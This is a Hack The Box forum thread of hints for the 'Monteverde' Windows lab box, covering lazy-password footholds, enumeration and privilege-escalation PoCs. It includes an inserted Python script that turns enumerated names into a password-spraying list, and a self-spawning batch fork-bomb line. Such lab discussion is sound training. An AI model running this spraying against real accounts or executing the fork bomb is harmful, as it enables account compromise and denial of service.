Monteverde

Comments

  • edited January 18

    Found the right local PoC. evil crashes when I run it. Do I need to specify another port?

  • Can anyone help me with guessing for the foothold? I seem really unable to guess it; my head is burning.

  • Finally rooted it.

    Huge thanks to @AXANO and @emmycat for nudges and guidance.

  • @imousrf said:

    Can anyone help me with guessing for the foothold? I seem really unable to guess it; my head is burning.

    Just start with basic enum, then take advantage of lazy users' bad habits in password choice.

    Hack The Box

  • @cyberafro said:

    Just start with basic enum, then take advantage of lazy users' bad habits in password choice.

    Just got it, thanks to you and @sinanozdemir.
    And yeah, just basic and lazy.

  • I found a list of users but I can't log in with any common passwords. I've tried guessing basic ones and some popular wordlists. What am I missing? Can someone DM me a hint for the foothold?

  • @SirFIS said:

    I found a list of users but I can't log in with any common passwords. I've tried guessing basic ones and some popular wordlists. What am I missing? Can someone DM me a hint for the foothold?

    It is a little bit annoying, but when you get this you will kick yourself. You have enough information right now, and you even have a password; you just don't realise it yet.

    Take all the lists of information you have now and make a wordlist out of it.

    Then try that.
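The wordlist-from-enumeration step the previous post describes, as an added example (not code from the thread or from the box author). It takes the domain, user and group names you already have, derives the guesses a lazy user would pick from them (the name itself, case changes, dropped separators, repetition, the usual suffixes), and lays the guesses out password-major so every account gets its first guess before any account gets a second. All names below are constructed sample data, not the box's real accounts; the cap on guesses per user is there so you stay under whatever lockout threshold the domain policy reports.

```python
from __future__ import annotations

from typing import Optional

# Constructed sample enumeration output (hypothetical names, not the box's).
DOMAIN = "corp.local"
USERS = ["svc-backup", "jdoe", "mwatson"]
GROUPS = ["Domain Admins", "Helpdesk", "Remote Management Users"]


def variants(token: str) -> list[str]:
    """Return the guesses a lazy user would derive from one enumerated token.

    Covers the habits the thread hints at: reusing the name itself, case
    changes, dropping separators, repeating it, and the classic suffixes.
    """
    base = token.strip()
    compact = base.replace(" ", "").replace("-", "").replace("_", "")
    forms = [base, base.lower(), base.capitalize(), base.upper(),
             compact, compact.lower(), compact.capitalize()]
    repeated = [f * 2 for f in (base.lower(), compact.lower())]
    suffixed = [f + s
                for f in (base, compact, base.capitalize(), compact.capitalize())
                for s in ("1", "123", "!", "2020")]
    return forms + repeated + suffixed


def build_wordlist(domain: str, users: list[str], groups: list[str]) -> list[str]:
    """Deduplicated, order-preserving guess list built from every enumerated name."""
    tokens = [domain, domain.split(".")[0], *users, *groups]
    seen: set[str] = set()
    words: list[str] = []
    for tok in tokens:
        for v in variants(tok):
            if v and v not in seen:
                seen.add(v)
                words.append(v)
    return words


def spray_pairs(users: list[str], words: list[str],
                max_per_user: Optional[int] = None) -> list[tuple[str, str]]:
    """Lay out (user, password) pairs password-major: each account sees its
    first guess before any account sees a second. max_per_user caps the
    guesses per account so a spray stays below the domain lockout threshold."""
    pairs: list[tuple[str, str]] = []
    for i, word in enumerate(words):
        if max_per_user is not None and i >= max_per_user:
            break
        pairs.extend((u, word) for u in users)
    return pairs


if __name__ == "__main__":
    wordlist = build_wordlist(DOMAIN, USERS, GROUPS)
    print(f"{len(wordlist)} guesses, first few: {wordlist[:6]}")
    # Two guesses per account, written in the user:password form most
    # spraying tools accept.
    for user, password in spray_pairs(USERS, wordlist, max_per_user=2):
        print(f"{user}:{password}")
```

Read the lockout policy before you spray anything; the cap in `spray_pairs` only helps if you set it from the real threshold.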

  • I have it, and you're right @TazWake, I am kicking myself for missing it.

  • Rooted. Feel free to PM me if you need a nudge :)

  • Just rooted.

    • user: No major skills are needed, and the overall process is very similar to many other boxes. Indeed, getting the first shell is all about the common admin laziness and the normal enumeration.

    • root: Learned something new. Despite the fact that I'm really potato with PS and s**, eventually I discovered a new way to get the info I need.

    echo start dumb.bat > dumb.bat && dumb.bat
    doh!

  • Been sitting on user credentials for a few hours now.
    Struggling to move forward with them.

    Arrexel
    CCNA, CCNA SEC, SEC+

  • @gsxrjason said:

    Been sitting on user credentials for a few hours now.
    Struggling to move forward with them.

    Assuming you've got user.txt

    Enumerate what unusual thing your user account is part of, and then Google attacks against that thing.

    If you haven't got user.txt yet, there is an evil tool you can use to do remote management on windows machines.

  • Initial foothold was fun and can definitely be linked to a real-world scenario. I think I've even been guilty of that once when I first started. Think what might not be in a wordlist, but also might be easily guessable!

    Really struggling with getting the PoC to work for root, however! If anyone wants to send me a nudge, then you're more than welcome to :)

    skunk

    Happy to offer nudges to anyone on boxes I've done, provided you show that you've reasonably tried to understand what the goal is! If I do help, please consider giving respect!

  • edited January 20

    Struggling to get the PoC to work. If anyone can point me in the right direction that would be amazing; been sat on this for a couple of hours now with no luck.

    Ignore! Worked it out by reading the instructions...

    PS C:\Users\Administrator\Desktop> whoami
    m......../administrator
    PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

    Mode   LastWriteTime      Length Name
    ----   -------------      ------ ----
    -ar--- 1/3/2020 5:48 AM       32 root.txt

  • Finally rooted, thanks to @iSmarsh for the final hint about the ps script.

    Good box. When googling, don't be so confident you'll find the correct script. I lost time for this reason.

  • edited January 21

    Don't suppose anyone's having issues with this:

    CategoryInfo : ParserError: (:) [], ParseException
    FullyQualifiedErrorId : TerminatorExpectedAtEndOfString

    Retyped the script but still having issues.

    Rooted! Thanks to @BrokenGQ for pointing out how to fix the above error and others who sent me nudges!

    My inbox is open for anyone else who needs a hint, what a journey. Definitely my hardest root so far.

    skunk

  • fun box
    User was too easy for a medium box; if you are stuck, think simple.
    I couldn't spot the vulnerability for root at first, but the hints on the forum were very useful, and once you find the PoC you only need to add one thing to connect.

    hit me up here or on discord if you need hints.

  • edited January 21

    Idk if i can't think simple or i'm using the wrong tools.

    I tried with lpch queries, krb*e (the user domain enumeration goes OK, but idk if the authentication can work), el-w***m with the most 'not-overthinking' passwords that I can think of, and all this started with rclt, but no luck after enumeration. I even did a s*bc***nt for wordlist bruteforcing with the users/groups enumerated at r**c****t, but just no...

    Did I miss something?

  • Feel free to dm me for hints. I will respond fast. I loved this box there is a lot of real world value to it!

  • @Taulio said:

    Idk if I can't think simple or I'm using the wrong tools.

    I tried with lpch queries, krb*e (the user domain enumeration goes OK, but idk if the authentication can work), el-w***m with the most 'not-overthinking' passwords that I can think of, and all this started with rclt, but no luck after enumeration. I even did a s*bc***nt for wordlist bruteforcing with the users/groups enumerated at r**c****t, but just no...

    Did I miss something?

    What's the laziest way of coming up with a password?

  • Repetition is a lazy trait!

  • Got it. I was trying with the wrong users because I missed the little 'response' things.
    Thanks.

    @CuriousJ @Reiahx01

  • edited January 22

    I have the users, the groups, domain, etc. But either I'm using the wrong tool or I'm unable to guess this password. I have created a password list of everything in the enumeration. Tried domain name, usernames, group names.

    What am I missing here?

    EDIT:

    Found it. I was overthinking it, and too much focus on one part of the enumeration. I also used the s*******t to connect.

  • Now I'm having trouble escalating to another user with the found creds. Evil will not connect?

    Any nudge?

  • Got user. Now enumerating for root. User is so simple that it is hard to take..

    t13nn3s

  • Very cool Windows box. Thx @egre55
    For the foothold, earlier in the topic there is an excellent article from OWASP. The next user is very simple, just enumerate.
    Root tip: there are several versions of the SMB protocol if you need to copy something from your machine. And there is a ready-made exploit (with screenshots from HTB in the article :) ) already in the form of an application that just works and gets the password.
    As usual, PM for hints.

  • edited January 24

    Thank you - @egre55

    Well that was a lesson learned on looking at lists and making sure you have everybody you need. I spent a lot of time trying everything without everyone being present.

    Respect has been given (hopefully) to everyone that gave me a little nudge.

    Confirming what AlexLTN said, root was very fast once you find the exploit to use.

  • Thanks for all your comments so far. Can someone give me a nudge regarding the Connection String? I can't really find a reference to any loc**db.
    Thanks!